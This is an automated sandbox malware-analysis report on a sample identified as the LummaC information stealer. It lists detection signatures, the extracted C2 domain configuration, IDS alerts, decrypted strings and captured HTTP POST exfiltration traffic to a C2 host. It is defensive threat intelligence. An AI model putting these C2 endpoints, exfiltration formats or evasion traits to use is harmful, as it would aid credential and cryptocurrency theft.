Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1545755
MD5:	1d66f9ed00f1c6697066bdaf8cdbe977
SHA1:	261d94ba3f129c901647b51aef7d88bb49febc94
SHA256:	fd3afa72989e02a20d04a5b23f4ad9f242ce5ff3fb32b41b109cc99c33187020
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 4872 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1D66F9ED00F1C6697066BDAF8CDBE977)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["presticitpo.store", "navygenerayk.store", "necklacedmny.store", "scriptyprefej.store", "crisiwarny.store", "founpiuer.store", "fadehairucw.store", "thumbystriw.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2177937623.000000000108B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 4872	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 4872	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 4872	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T23:11:10.908564+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49709	188.114.97.3	443	TCP
2024-10-30T23:11:12.263043+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49711	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T23:11:10.908564+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49709	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T23:11:12.263043+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49711	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T23:11:10.234069+0100	2057124	1	Domain Observed Used for C2 Detected	192.168.2.6	49709	188.114.97.3	443	TCP
2024-10-30T23:11:11.575725+0100	2057124	1	Domain Observed Used for C2 Detected	192.168.2.6	49711	188.114.97.3	443	TCP
2024-10-30T23:11:13.110467+0100	2057124	1	Domain Observed Used for C2 Detected	192.168.2.6	49712	188.114.97.3	443	TCP
2024-10-30T23:11:14.448051+0100	2057124	1	Domain Observed Used for C2 Detected	192.168.2.6	49713	188.114.97.3	443	TCP
2024-10-30T23:11:16.049790+0100	2057124	1	Domain Observed Used for C2 Detected	192.168.2.6	49714	188.114.97.3	443	TCP
2024-10-30T23:11:17.640138+0100	2057124	1	Domain Observed Used for C2 Detected	192.168.2.6	49716	188.114.97.3	443	TCP
2024-10-30T23:11:19.172195+0100	2057124	1	Domain Observed Used for C2 Detected	192.168.2.6	49722	188.114.97.3	443	TCP
2024-10-30T23:11:21.426725+0100	2057124	1	Domain Observed Used for C2 Detected	192.168.2.6	49739	188.114.97.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T23:11:09.481914+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.6	49737	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T23:11:09.543050+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.6	60573	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T23:11:09.570432+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.6	59511	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T23:11:09.458593+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.6	56635	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T23:11:09.555540+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.6	63818	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T23:11:15.212053+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49713	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: file.exe.4872.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "navygenerayk.store", "necklacedmny.store", "scriptyprefej.store", "crisiwarny.store", "founpiuer.store", "fadehairucw.store", "thumbystriw.store"], "Build id": "4SD0y4--legendaryy"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: scriptyprefej.store
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: navygenerayk.store
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: founpiuer.store
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: necklacedmny.store
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: thumbystriw.store
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: fadehairucw.store
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: crisiwarny.store
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: presticitpo.store
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: presticitpo.store
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2268425519.0000000000241000.00000040.00000001.01000000.00000003.sdmp	String decryptor: 4SD0y4--legendaryy

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0025D7F8 CryptUnprotectData,

0_2_0025D7F8

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49722 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_0025104F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]	0_2_0024E1A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_0027E210
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esi+64h]	0_2_002715DC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	0_2_0026F9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esi+10h], edx	0_2_0026F9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0026F9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0026F9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+6D44C030h]	0_2_0026AB20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h	0_2_0026AB20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+75E07B5Ch]	0_2_0024EC20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00284C40
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, esi	0_2_0027BCA9
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0000008Ah]	0_2_0024CF90
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	0_2_0027F020
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov esi, dword ptr [esp+1Ch]	0_2_0027F020
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, eax	0_2_0026702F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [eax+ebx], 30303030h	0_2_00241000
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [eax+ebx], 20202020h	0_2_00241000
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+38h]	0_2_0025E07E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ecx, eax	0_2_0026A083
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-6Ch]	0_2_0026A083
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [0028DCFCh]	0_2_0027C132
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov esi, ecx	0_2_00282165
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00268290
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], B62B8D10h	0_2_0026D2FD
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [esp]	0_2_0026D2FD
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+29352E8Dh]	0_2_00285330
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], B62B8D10h	0_2_0026C3A6
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, dword ptr [esp+04h]	0_2_002414A8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, edx	0_2_002824E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_002514CE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+58h]	0_2_00262520
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_002835F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	0_2_002835F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax]	0_2_002636AC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	0_2_002666E0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_0026F73A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_00283740
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	0_2_00283740
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-3ED06EDAh]	0_2_0027C7A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0026E7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_00270887
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	0_2_00245890
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add edx, esi	0_2_002698F2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00266940
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp ecx	0_2_002839C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	0_2_002839C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	0_2_00283A90
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then and esi, 001FF800h	0_2_00244BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	0_2_0025FBA0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00278C80
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6D44C02Ch]	0_2_0027FC90
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	0_2_0026ECE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ebp+edx*4+00h], ax	0_2_0024BD50
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]	0_2_0024BD50
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	0_2_00283D90
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp edx	0_2_00248EF0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [edx], bp	0_2_00261EC5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ecx], di	0_2_00261EC5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_00270F3E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:63818 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:56635 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:59511 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:49737 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49716 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:60573 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49712 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49714 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49713 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49722 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49739 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49711 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49713 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: thumbystriw.store

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12864Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15110Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19968Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1225Host: necklacedmny.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551686Host: necklacedmny.store

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store

Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2268195240.0000000001080000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2206260357.0000000005A2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2207642867.000000000593F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2178023365.000000000596C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2207642867.000000000593F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
